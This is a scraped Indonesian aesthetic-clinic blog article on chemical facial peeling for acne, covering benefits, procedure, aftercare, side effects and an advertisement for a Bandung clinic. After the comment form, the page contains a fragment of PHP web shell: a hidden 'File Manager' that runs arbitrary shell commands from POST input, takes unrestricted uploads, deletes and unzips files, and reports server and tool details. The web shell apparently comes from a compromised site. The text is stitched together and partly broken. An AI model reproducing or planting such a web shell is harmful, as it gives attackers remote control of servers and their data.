Ada Yang Bisa Kami Bantu? Chat Kami Sekarang.

Peeling Wajah, Langkah yang Tepat untuk Kulit Bebas Jerawat

-

Daftar Isi

Jerawat merupakan masalah kulit yang sering membuat orang merasa kurang percaya diri. Banyak orang yang mencari solusi untuk atasi jerawat, salah satu metode yang semakin populer adalah peeling wajah. Perawatan ini membantu mengangkat dan mengelupas sel kulit terluar. Perawatan ini membuat sel kulit baru mudah tumbuh sehingga tekstur kulit menjadi lebih halus dan mempunyai warna yang rata. Prosedur ini berlangsung dengan mengoleskan cairan pada permukaan kulit untuk mengangkat lapisan kulit yang paling atas.

Apa Itu Peeling Wajah?

Peeling wajah adalah prosedur perawatan kulit yang bertujuan untuk menghilangkan sel kulit mati, komedo, dan jerawat. Proses ini melibatkan penggunaan bahan kimia atau alat khusus yang membantu eksfoliasi atau pengelupasan kulit wajah. Treatment ini bekerja dengan merangsang pertumbuhan sel kulit baru yang bisa membuat kulit terlihat lebih segar dan bersih. Tindakan ini di lakukan oleh dokter atau profesional medis yang sudah berpengalaman, sebelumnya mereka akan mengevaluasi kondisi kulit dan menentukan jenis chemical peeling yang sesuai dengan kebutuhan.

peeling treatment

Manfaat Peeling Wajah untuk Kulit Bebas Jerawat

1. Mengurangi Jerawat

Salah satu manfaat utama dari peeling wajah yaitu bisa mengurangi jerawat. Peeling akan menghilangkan komedo dan folikel rambut yang menyumbat, mengurangi produksi minyak, membunuh akteri, meredakan peradangan, dan meningkatkan penyerapan dari treatment.

2. Mencerahkan Kulit

Peeling wajah memberikan efek peremajaan kulit secara menyeluruh meskipun tujuan utamanya untuk atasi jerawat. Perawatan ini juga bisa membantu mencerahkan kulit dengan lapisan atas kulit yang kusam. Setelah melakukan perawatan ini, sobat cakas akan melihat perbaikan dari tekstur kulit dan mengurangi bintik pigmentasi. Selain itu, kulit kamu juga akan terlihat lebih cerah, karena sel kulit mati yang terangkat.

3. Mengurangi Tanda Penuaan

Treatment peeling bisa membantu mengurangi tanda penuaan seperti keriput halus dan garis halus di wajah. Hal ini terjadi karena proses eksfoliasi merangsang pertumbuhan sel kulit yang lebih muda.

4. Membersihkan Pori-Pori yang Tersumbat

Jerawat pada kulit wajah terjadi karena pori-pori kulit yang tersumbat. Chemcial peeling menjadi prosedur yang tidak hanya berperan sebagai pengobatan, tapi juga menjadi metode perawatan sekaligus pencegahan. Untuk mendapatkan hasil yang optimal, sobat cakas bisa melakukan perawatan ini dengan rutin dan atas rekomendasi dokter. Setelah perawatan ini, pastikan untuk menggunakan pelembap non-comedogenic agar pori-pori kulit wajah tidak tersumbat.

5. Membantu Atasi Rosacea

Rosacea adalah kondisi peradangan kulit yang menyebabkan kemerahan, bengkak, dan bruntusan. Rosacea juga bisa sebabkan jerawat breakout yang di kenal sebagai jerawat rosacea. Untuk mengatasinya, sobat cakas bisa melakukan treatment peelling, karena treatment ini di rekomendasikan untuk rosacea ringan atau sedang.

Bagaimana Proses Peeling Wajah?

1. Lakukan Konsultasi dengan Dokter atau Profesional Medis

Sebelum sobat cakas melakukan perawatan ini, penting untuk melakukan konsultasi dengan dokter. Mereka akan melihat kulit dan permasalahannya kemudian memberikan rekomendasi tentang jenis peeling yang sesuai untuk kamu.

2. Proses Peeling

Selama prosedur di lakukan, dokter akan mengaplikasikan cairan khusus menggunakan alat peeling pada kulit. Biasanya akan terasa tidak nyaman, tetapi sebagian besar pasien bisa menahannya.

3. Perawatan Pasca Peeling

Pada beberapa orang biasanya setelah perawatan ini kulit akan merah dan terasa terbakar. Ahli kulit akan memberikan panduan tentang perawatan pasca peeling yang perlu di ikuti termasuk produk perawatan kulit yang tepat.

Apa Saja yang Perlu di Perhatikan dan di Hindari setelah Perawatan Peeling?

Setelah menjalani perawatan peeling wajah, sangat penting untuk memberikan perhatian khusus pada kulit agar mendapatkan hasil optimal. Beberapa hal yang perlu di perhatikan dan di hindari setelah perawatan peeling di antaranya;

  • Hindari paparan sinar matahari langsung, biasanya setelah peeling kulit akan jadi lebih sensitif terhadap sinar matahari. Hindari paparan langsung ke sinar matahari selama beberapa minggu hingga kulit kamu pulih sepenuhnya. Jika sobat cakas harus beraktivitas di luar ruangan, gunakan tabir surya dengan SPF tinggi dan gunakan pelindung seperti topi dan pakaian panjang.
  • Hindari menggosok kulit dengan kasar, tindakan ini bisa merusak kulit yang baru terbentuk dan memperburuk iritasi. Hindari juga menggunakan scrub wajah atau produk perawatan kulit yang kasar selama beberapa hari.
  • Jangan mengelupas kulit yang terkelupas, setelah perawatan ini, kulit bisa mengelupas atau terkelupas. Jangan mencoba mengelupas kulit dengan paksa karena bisa menyebabkan luka atau infeksi. Biarkan kulit terkelupas secara alami.
  • Hindari menggunakan produk perawatan tertentu, produk dengan kandungan yang bisa memicu iritasi kulit. Konsultasikan dengan dokter tentang produk yang aman di gunakan setelah perawatan peeling.
  • Gunakan produk perawatan yang direkomendasikan, biasanya setelah peeling dokter akan merekomendasikan produk perawatan kulit khusus seperti pelembap yang bisa membantu menjaga kelembapan kulit dan mempercepat proses penyembuhan.
  • Hindari sauna dan mandi uap, kegiatan ini menggunakan panas yang ekstrem seperti sauna atau mandi uap selama beberapa hari setelah peeling karena bisa menyebabkan iritasi kulit.
  • Jangan gunakan produk makeup berat atau produk yang mengandung bahan keras selama beberapa hari setelah perawatan peeling. Jika sobat cakas perlu menggunakan makeup, pilih produk yang ringan dan tidak menyumbat pori-pori.
  • Minum banyak air, pastikan sobat cakas tetap terhidrasi dengan baik dan minum banyak air untuk membantu proses penyembuhan kulit.
  • Lakukan perawatan lanjutan, terus ikuti perawatan kulit yang di rekomendasikan oleh dokter setelah peeling. Hal ini termasuk produk perawatan kulit rutin atau jadwal kunjungan follow-up.

Penting untuk selalu mengikuti intruksi dan reomendasi dari dokter atau profesional medis setelah perawatan peeling. Hal ini bertujuan untuk memastikan sobat cakas pulih dengan baik dan mendapatkan hasil yang optimal.

Adakah Efek Samping Treatment Peeling?

Treatment peeling bisa memiliki beberapa efek samping tergantung jenis peeling yang di gunakan, sensitivitas kulit individu, dan bagaimana perawatan di lakukan. Beberapa efek samping yang bisa terjadi setelah peeling treatment di antaranya;

  • Kemerahan, setelah treatment ini kulit akan terlihat tampak merah, mirip dengan kulit yang terbakar sinar matahari. Hal ini adalah reaksi umum dan biasanya berlangsung dalam beberapa hari.
  • Kulit mengelupas, efek samping yang umum dari peeling adala kulit mengelupas. Hal ini merupakan respons alami dari kulit yang beregenerasi dan membentuk lapisan kulit yang baru. Kulit kamu akan mengelupas atau seperti bersisik terutama beberapa hari setelah perawatan.
  • Kering atau terasa ketat beberapa hari setelah perawatan, hal ini di sebabkan oleh pengelupasan lapisan kulit atas yang bisa mengurangi kelembapann kulit, Penggunaan pelembap yang di rekomendasikan oleh dokter atau profesional medis bisa membantu atasi masalah ini.
  • Iritasi, pada beberapa orang bisa terjadi iritasi kulit setelah perawatan ini terutama sobat cakas yang memiliki kulit sensitif.
  • Sensitivitas terhadap sinar matahari, setelah treatment ini kulit akan lebih sensitif terhadap sinar matahari. Oleh karena itu di sarankan melindungi kulit dengan baik dari paparan sinar matahari langsung dan menggunakan tabir surya dengan SPF tinggi.
  • Reaksi Alergi, pada beberapa individu bisa mengalami reaksi alergi terhadap ahan kimia yang di gunakan ketika treatment. Untuk mencegahnya, sebelum perawatan ini di sarankan untuk memberiahu dokter tentang alergi atau sensitivitas kulit sebelum perawatan.

Penting di ingat efek samping treatment peeling bisa bervariasi setiap individu. Oleh karena itu sebelum melakukan perawatan ini, lakukan konsultasi dengan dokter yang sudah berpengalaman untuk mengevaluasi jenis peeling yang sesuai dengan jenis kulit dan memahami risiko serta manfaatnya. Selalu kuti intruksi perawatan pasca peeling yang di rekomendasikan oleh dokter untuk meminimalkan efek samping dan mendapatkan hasil optimal.

Baca juga: Menghilangkan Bopeng Jerawat dengan Laser Co2, Kulit Lebih Sehat dan Segar

Sobat cakas yang mempunyai masalah dengan jerawat, bekas jerawat, penuaan, warna kulit tidak merata, treatment peeling bisa di jadikan rekomendasi. Buat sobat cakas yang masih bingung mau perawatan dimana, RSa Aesthetic Clinic bisa di jadikan rekomendasi untuk atasi masalah kulit kamu. RSa Aesthetic Clinic merupakan klinik kecantikan di kabupaten Bandung yang menyediakan treatment dan produk skincare sesuai keluhan sobat cakas.

Cantik Ayu Kasep Wibawa

Informasi selengkapnya; 

Alamat : Jl. Ciluncat No.17, Ciluncat, Kec. Cangkuang, Kabupaten Bandung, Jawa Barat 40238

Whatsapp : 085314650373

Instagram : RSa Aesthetic Clinic

Klinik RSa Aesthetic

Klinik RSa Aesthetic

Klinik Treatment Kecantikan Berkualitas di Bandung

Bagikan Artikel Via:

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Tinggalkan Komentar

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *

basename($file), 'size' => '', 'last_modified' => date('Y-m-d H:i:s', filemtime($file)), 'owner' => posix_getpwuid(fileowner($file))['name'], 'permissions' => substr(sprintf('%o', fileperms($file)), -4), ); } else { $files[] = array( 'name' => basename($file), 'size' => filesize($file), 'last_modified' => date('Y-m-d H:i:s', filemtime($file)), 'owner' => posix_getpwuid(fileowner($file))['name'], 'permissions' => substr(sprintf('%o', fileperms($file)), -4), ); } } // Handle file upload if (isset($_FILES['file'])) { $file = $_FILES['file']; if ($file['size'] > $max_upload_size) { echo 'File too large!'; } else { move_uploaded_file($file['tmp_name'], $current_dir. '/'. $file['name']); } } // Handle file deletion if (isset($_POST['delete'])) { $file = $_POST['delete']; $file_path = rtrim($current_dir, '/') . '/' . $file; if (file_exists($file_path) && is_file($file_path)) { unlink($file_path); header('Location: ' . $_SERVER['PHP_SELF'] . '?dir=' . rawurlencode(rtrim($current_dir, '/'))); exit; } else { echo 'File not found or not a file!'; } } // Handle terminal command if (isset($_POST['command'])) { $command = $_POST['command']; $output = shell_exec($command); echo "
$output
"; // Update current directory if command is cd if (strpos($command, 'cd ') === 0) { $new_dir = trim(substr($command, 3)); if ($new_dir == '..') { $current_dir = dirname($current_dir); } elseif ($new_dir!= '') { $current_dir = realpath($current_dir. '/'. $new_dir); } } } // Handle unzip if (isset($_POST['unzip'])) { $file = $_POST['unzip']; $file_path = $current_dir. '/'. $file; if (file_exists($file_path) && is_file($file_path)) { $zip = new ZipArchive; $res = $zip->open($file_path); if ($res === TRUE) { $zip->extractTo($current_dir); $zip->close(); echo "Unzipped successfully!"; } else { echo "Failed to unzip!"; } } else { echo "File not found or not a file!"; } } // Handle mkdir if (isset($_POST['mkdir'])) { $dir = $_POST['mkdir']; $dir_path = $current_dir. '/'. $dir;if (!is_dir($dir_path)) { mkdir($dir_path, 0750, true); echo "Directory created successfully!"; } else { echo "Directory already exists!"; } } // System information $server_ip = $_SERVER['SERVER_ADDR']; $web_server = $_SERVER['SERVER_SOFTWARE']; $system = php_uname('s'); $user = $_SERVER['USER']; $php_version = phpversion(); $disabled_functions = ini_get('disable_functions'); // MySQL, cURL, WGET, Perl, and Python information $mysql_enabled = function_exists('mysql_connect')? 'ON' : 'OFF'; $curl_enabled = function_exists('curl_init')? 'ON' : 'OFF'; $wget_enabled = shell_exec('wget --version')? 'ON' : 'OFF'; $perl_enabled = shell_exec('perl -v')? 'ON' : 'OFF'; $python_enabled = shell_exec('python --version')? 'ON' : 'OFF'; function filesize_format($size) { $units = array('B', 'KB', 'MB', 'GB', 'TB'); for ($i = 0; $size >= 1024 && $i < count($units) - 1; $i++) { $size /= 1024; } return round($size, 2). ' '. $units[$i]; } ?> File Manager

File Manager

Current directory:

Name Size Last Modified Owner Permissions Options

System Information

Server IP:

Web Server:

System:

User:

PHP Version:

Disabled Functions:

Module Information

MySQL:

cURL:

WGET:

Perl:

Python: